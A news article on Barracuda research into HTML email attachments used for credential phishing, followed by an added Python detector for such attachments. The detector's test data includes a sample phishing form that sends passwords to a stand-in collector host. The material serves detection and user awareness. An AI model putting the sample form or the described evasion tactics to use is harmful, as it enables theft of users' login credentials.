Barracuda researchers discover malicious HTML attachments being used in emails
Researchers at Barracuda have recently analyzed data on the millions of attachments scanned by Barracuda systems over the past month to identify HTML attachments being used the most for malicious purposes. 21% of all HTML attachments scanned by Barracuda were malicious.
HTML attachments are commonly used in email communication. They are particularly common in system-generated email reports that users might receive regularly, where the message includes URL links to the actual report. Attackers have been embedding HTML attachments in emails disguised as a weekly report, tricking users into clicking on phishing links. The technique succeeds because attackers no longer need to include malicious links in the email itself, allowing them to easily bypass anti-spam and anti-virus policies.
The malicious HTML attachments are being used for credential phishing. The attachment includes a link to a phishing site; when opened, it redirects the user to a third-party machine that asks them to enter their credentials to access information or download a file that may contain malware. Attackers don't always need to create a fake website. They can embed a phishing form directly in the attachment, in effect sending the phishing site as an attachment instead of a link.
“These attacks are difficult to detect because HTML attachments themselves are not malicious. Attackers do not include malware in the attachment but instead use multiple redirects with JavaScript libraries hosted elsewhere. Potential protection against these attacks should take into account an entire email with HTML attachments, looking at all redirects and analyzing the content of the email for malicious intent,” said Parag Khurana, Country Manager, Barracuda Networks India.
Because such HTML attachments are hard to identify accurately, and detection often produces many false positives, the best solutions are machine learning and static code analysis that can evaluate the content of an email to identify and block malicious HTML attachments.
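The following is an added example, not Barracuda's detection logic or code from the article: a small static check over an email's HTML attachments that flags the traits described above (an embedded credential form, scripts hosted elsewhere, redirects). The indicator names, helper functions and the sample message are assumptions constructed for illustration.

```python
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

class AttachmentScan(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self.in_script = set(), False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        self.in_script = tag == "script"
        if tag == "input" and a.get("type", "").lower() == "password":
            self.findings.add("password-field")
        elif tag == "form" and urlparse(a.get("action", "")).netloc:
            self.findings.add("form-posts-to-remote-host")
        elif tag == "script" and urlparse(a.get("src", "")).netloc:
            self.findings.add("remote-script")
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.add("meta-refresh-redirect")

    def handle_endtag(self, tag):
        self.in_script = False

    def handle_data(self, data):
        if self.in_script and "location" in data:  # heuristic: inline script navigates away
            self.findings.add("script-redirect")

def scan_html(html):
    scanner = AttachmentScan()
    scanner.feed(html)
    return sorted(scanner.findings)

def scan_message(msg):
    results = {}  # attachment filename -> sorted findings
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        if part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html")):
            raw = part.get_payload(decode=True) or b""
            results[name] = scan_html(raw.decode(part.get_content_charset() or "utf-8", "replace"))
    return results

# Constructed sample: the attachment itself carries the credential form.
SAMPLE_HTML = """<html><head><script src="https://cdn.example.net/lib.js"></script></head>
<body><form action="https://collector.example.org/submit" method="post">
<input name="user"><input type="password" name="pass"></form></body></html>"""

def build_sample():
    msg = EmailMessage()
    msg.set_content("Your weekly report is attached.")
    msg.add_attachment(SAMPLE_HTML, subtype="html", filename="report.html")
    return msg
```

Findings like these are triage signals to combine with sender and content analysis, since legitimate HTML reports can also load remote scripts.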
Meanwhile, given the volume of these attacks, users should be wary of all HTML attachments, especially those coming from sources they haven’t seen before. They must be trained with examples of these attacks as part of their phishing simulation campaigns and urged to always double-check before sharing their login credentials.
In case malicious emails get through, post-delivery remediation tools need to be kept ready to quickly identify and remove every instance of those emails from all user inboxes. Automated incident response can help do this quickly before attacks spread through an organization, and account takeover protection can monitor for suspicious account activity and alert users if login credentials are compromised.